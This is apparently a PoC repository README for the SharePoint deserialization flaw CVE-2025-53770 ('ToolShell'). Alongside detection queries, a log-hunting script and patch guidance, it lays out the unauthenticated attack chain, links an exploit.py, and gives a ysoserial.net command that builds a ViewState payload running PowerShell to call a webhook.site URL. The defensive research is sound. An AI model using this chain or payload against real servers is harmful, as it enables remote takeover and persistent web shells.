CVE-2025-53770 PoC — Microsoft SharePoint Server Remote Code Execution Vulnerability

**Associated vulnerability:** Microsoft SharePoint Server Remote Code Execution Vulnerability (CVE-2025-53770)

**Description:** Deserialization of untrusted data in on-premises Microsoft SharePoint Server allows an unauthorized attacker to execute code over a network. Microsoft is aware that an exploit for CVE-2025-53770 exists in the wild. Microsoft is preparing and fully testing a comprehensive update to address this vulnerability. In the meantime, please make sure that the mitigation provided in this CVE documentation is in place so that you are protected from exploitation.

**Repository description:** Exploit & research for CVE‑2025‑53770 – a zero‑day remote code execution vulnerability in Microsoft SharePoint (on‑premises).

# CVE-2025-53770 - Zero-day exploitation in the wild of Microsoft SharePoint servers

## Overview
In mid‑July 2025, Microsoft disclosed **CVE‑2025‑53770**, a **zero‑day remote code execution** vulnerability in **on‑premises SharePoint**. This flaw, when chained with **CVE‑2025‑53771**, enables **unauthenticated attackers** to fully compromise vulnerable servers over the internet. 

The exploitation campaign, dubbed **"ToolShell"**, has been observed **actively targeting governments, energy, education, and telecom sectors worldwide**. If you run **SharePoint Server (2016/2019/Subscription)** and expose it to the internet, you need to **patch now**.

### Impact at a glance
- **Attack Vector:** Remote, unauthenticated  
- **Impact:** Full RCE (IIS worker context)  
- **Exploitation:** Active (confirmed by MS + CISA)  
- **Ease:** Exploitable with a single HTTP POST  

---

## Vulnerability Details

The issue lies in **unsafe deserialization** of crafted `__VIEWSTATE` data in the **ToolPane.aspx** component. When combined with a **referer spoof** (CVE‑2025‑53771), attackers can reach this endpoint **without authentication**, feed it a malicious payload, and gain **remote code execution** as the **w3wp.exe** (IIS worker) process.

### The attack chain:
1. **Authentication bypass**: Use `Referer: /_layouts/SignOut.aspx` to bypass security checks on `/_layouts/15/ToolPane.aspx?DisplayMode=Edit`.
2. **Malicious ViewState**: Send a **signed or forged ViewState** payload containing serialized gadget chains (crafted via tools like **ysoserial.net**).
3. **RCE**: SharePoint deserializes the payload and executes attacker‑controlled code.
4. **Persistence**: Attackers drop a web shell (e.g., `spinstall0.aspx`) and steal **machine keys** for future signed payload generation.

### Visualized:
```
[ Attacker ]
     |
     v
POST /_layouts/15/ToolPane.aspx
Referer: /_layouts/SignOut.aspx
     |
     v
[ SharePoint Server ]
Deserializes malicious __VIEWSTATE
     |
     v
[ RCE: Attacker code runs as w3wp.exe ]
```

---

## Why It Matters

- **No authentication required**: Works from the internet if the server is exposed.  
- **Full takeover**: Post‑exploitation, attackers can upload shells, pivot laterally, and persist even after patching by abusing stolen machine keys.  
- **Exploited in the wild**: Microsoft, CISA, and Rapid7 have confirmed **active exploitation** in multiple regions.  

---

## Affected Versions

- **SharePoint Server 2016** (before KB5002760)  
- **SharePoint Server 2019** (before KB5002754)  
- **SharePoint Subscription Edition** (before KB5002768)  

(**SharePoint Online is not affected**.)

---

## Indicators of Compromise

- Requests to:  
  ```
  /_layouts/15/ToolPane.aspx?DisplayMode=Edit
  ```
  with `Referer: /_layouts/SignOut.aspx`.
- Dropped files:  
  ```
  spinstall0.aspx
  spinstall1.aspx
  ```
- Suspicious process chains:  
  ```
  w3wp.exe → cmd.exe → powershell.exe -EncodedCommand
  ```
- Known attacker IPs:  
  ```
  107.191.58.76, 104.238.159.149, 96.9.125.147
  ```

---

## Detection & Hunting

### Splunk (IIS Logs)
```spl
index=iis sourcetype="ms:iis:auto" 
cs_uri_stem="/_layouts/15/ToolPane.aspx"
cs_referer="/_layouts/SignOut.aspx"
| stats count by clientip, cs_user_agent, _time
```

### KQL (Microsoft Sentinel)
```kql
W3CIISLog
| where csUriStem == "/_layouts/15/ToolPane.aspx"
| where csReferer == "/_layouts/SignOut.aspx"
| summarize count() by cIP, csUserAgent, TimeGenerated
```
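The Splunk and KQL queries above cover one indicator each. The script below is an added example (not part of this repository and not its `exploit.py`) that runs the same hunt offline over raw IIS W3C log lines, so the checks from the Indicators of Compromise section (SignOut referer on ToolPane.aspx, the `spinstall*.aspx` file names, the listed IPs) and the "large ViewState" review from the hardening steps can be applied to an exported log in one pass. It assumes the standard W3C log layout with the `cs-bytes` field enabled; the 16 KiB request-size threshold is an arbitrary tuning value chosen for this example, since the README gives no number, and the log lines are constructed for the demonstration.

```python
"""Hunt IIS W3C logs for the CVE-2025-53770 / ToolShell indicators listed in the README."""
from __future__ import annotations

from collections import Counter
from dataclasses import dataclass
from typing import Iterable, Iterator
from urllib.parse import urlparse

# Indicators taken from the README's IoC section.
TOOLPANE_PATH = "/_layouts/15/toolpane.aspx"
SIGNOUT_PATH = "/_layouts/signout.aspx"
WEBSHELL_NAMES = {"spinstall0.aspx", "spinstall1.aspx"}
KNOWN_ATTACKER_IPS = {"107.191.58.76", "104.238.159.149", "96.9.125.147"}

# Assumption: the README only says "large ViewState data"; 16 KiB of request body
# sent to ToolPane.aspx is an arbitrary threshold chosen for this example.
LARGE_POST_BYTES = 16 * 1024


@dataclass
class Finding:
    rule: str
    line_no: int
    client_ip: str
    uri_stem: str
    detail: str


def parse_w3c(lines: Iterable[str]) -> Iterator[tuple[int, dict[str, str]]]:
    """Yield (line_no, record) for each data line, keyed by the current #Fields header.

    IIS writes '-' for empty values and re-emits #Fields when the layout changes,
    so the field list is tracked while reading rather than hard-coded.
    """
    fields: list[str] = []
    for line_no, raw in enumerate(lines, start=1):
        line = raw.rstrip("\r\n")
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split(":", 1)[1].split()
            continue
        if line.startswith("#"):
            continue  # other directives: #Software, #Version, #Date
        values = line.split()
        if not fields or len(values) != len(fields):
            continue  # header-less or malformed line: skip rather than guess
        yield line_no, dict(zip(fields, values))


def _path(referer: str) -> str:
    """Normalise cs(Referer), which may be a full URL or a bare path, to a lowercase path."""
    return "" if referer == "-" else urlparse(referer).path.lower()


def hunt(lines: Iterable[str]) -> list[Finding]:
    """Apply the README's indicators to parsed log records and return every hit."""
    findings: list[Finding] = []
    for line_no, rec in parse_w3c(lines):
        stem = rec.get("cs-uri-stem", "").lower()
        referer = _path(rec.get("cs(Referer)", "-"))
        client_ip = rec.get("c-ip", "-")
        method = rec.get("cs-method", "")
        sent = rec.get("cs-bytes", "-")
        is_toolpane = stem.endswith(TOOLPANE_PATH)

        if is_toolpane and referer.endswith(SIGNOUT_PATH):
            findings.append(Finding("toolpane_signout_referer", line_no, client_ip, stem,
                                    "referer=" + rec.get("cs(Referer)", "-")))
        if client_ip in KNOWN_ATTACKER_IPS:
            findings.append(Finding("known_attacker_ip", line_no, client_ip, stem, "listed IP"))
        if stem.rsplit("/", 1)[-1] in WEBSHELL_NAMES:
            findings.append(Finding("webshell_path", line_no, client_ip, stem, "known web shell name"))
        if is_toolpane and method == "POST" and sent.isdigit() and int(sent) >= LARGE_POST_BYTES:
            findings.append(Finding("large_toolpane_post", line_no, client_ip, stem,
                                    f"cs-bytes={sent} >= {LARGE_POST_BYTES}"))
    return findings


def summarize(findings: list[Finding]) -> dict[str, int]:
    """Count findings per rule, handy for a quick triage view."""
    return dict(Counter(f.rule for f in findings))


# Constructed sample log: one ToolShell-style request, two benign requests, one web shell hit.
SAMPLE_LOG = r"""#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken cs-bytes
2025-07-19 10:15:02 10.0.0.5 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit 443 - 107.191.58.76 Mozilla/5.0 /_layouts/SignOut.aspx 200 0 0 120 58331
2025-07-19 10:15:10 10.0.0.5 GET /_layouts/15/start.aspx - 443 CORP\alice 192.168.1.20 Mozilla/5.0 https://sp.corp.example/sites/hr 200 0 0 15 412
2025-07-19 10:16:00 10.0.0.5 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit 443 CORP\bob 192.168.1.30 Mozilla/5.0 https://sp.corp.example/_layouts/15/settings.aspx 200 0 0 40 2210
2025-07-19 10:17:00 10.0.0.5 GET /_layouts/15/spinstall0.aspx - 443 - 96.9.125.147 python-requests/2.31 - 200 0 0 5 0
"""

if __name__ == "__main__":
    hits = hunt(SAMPLE_LOG.splitlines())
    for h in hits:
        print(f"line {h.line_no}: {h.rule:<26} {h.client_ip:<16} {h.uri_stem} ({h.detail})")
    print(summarize(hits))
```

The third data line shows why the referer check matters more than the path alone: an authenticated editor legitimately POSTs to ToolPane.aspx, and only the SignOut referer, the request size, or a listed source IP separate it from the attack pattern. Point `hunt()` at `open(path)` for a real `u_ex*.log` export; because `parse_w3c` re-reads `#Fields`, concatenated logs with differing layouts parse correctly.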

---

## Proof‑of‑Concept (Python)

A Python PoC is provided to test for CVE‑2025‑53770.

- **[exploit.py](exploit.py)**

### Generating a payload:

To test whether the target processes ViewState and executes commands, you can generate a callback payload with `ysoserial.net`.  
This example makes a PowerShell web request to a [Webhook.site](https://webhook.site) URL you control:

```bash
ysoserial.exe -p ObjectDataProvider -o base64 -g WindowsIdentity -c powershell -c "iwr 'https://webhook.site/3a5dbeec-f481-4515-b827-52c69a41b4d8'" > payload.txt
```
Then replace `__VIEWSTATE` with the contents of payload.txt.

---

## Mitigation & Hardening

1. **Patch immediately**:
    - [KB5002768](https://support.microsoft.com/help/5002768) (Subscription Edition)
    - [KB5002754](https://support.microsoft.com/help/5002754) (2019)
    - [KB5002760](https://support.microsoft.com/help/5002760) (2016)
2. **Rotate machine keys** (twice): Update the `machineKey` in `web.config` to invalidate stolen signing keys.
3. **Restrict access** to `/_layouts/15/ToolPane.aspx` to **internal networks only**.
4. **Enable IIS request filtering** to block oversized or suspicious ViewState payloads.
5. **Enable Defender AV + AMSI integration** for real‑time scanning of SharePoint components.
6. **Hunt for compromise**: Review IIS logs for ToolPane.aspx requests with unusual referers or large ViewState data.

---

## Key Takeaways

- CVE‑2025‑53770 is being actively exploited.  
- The attack is trivial once discovered (POST + spoofed Referer).  
- Patching alone is not enough — **rotate machine keys** to invalidate stolen ViewState signing keys.  
- Monitor for **web shells** (`spinstall0.aspx`, etc.) and suspicious ToolPane.aspx requests.  

---

**References**:  
- [Microsoft MSRC](https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/)  
- [Rapid7 Blog](https://www.rapid7.com/blog/post/etr-zero-day-exploitation-of-microsoft-sharepoint-servers-cve-2025-53770/)  
- [CISA KEV](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)  
**File snapshot**:
```
/data/pocs/9e5190b77619a60a797ee122e109aebbd4ff8c59
├── exploit.py   (1.3K)
└── README.md    (5.6K)
```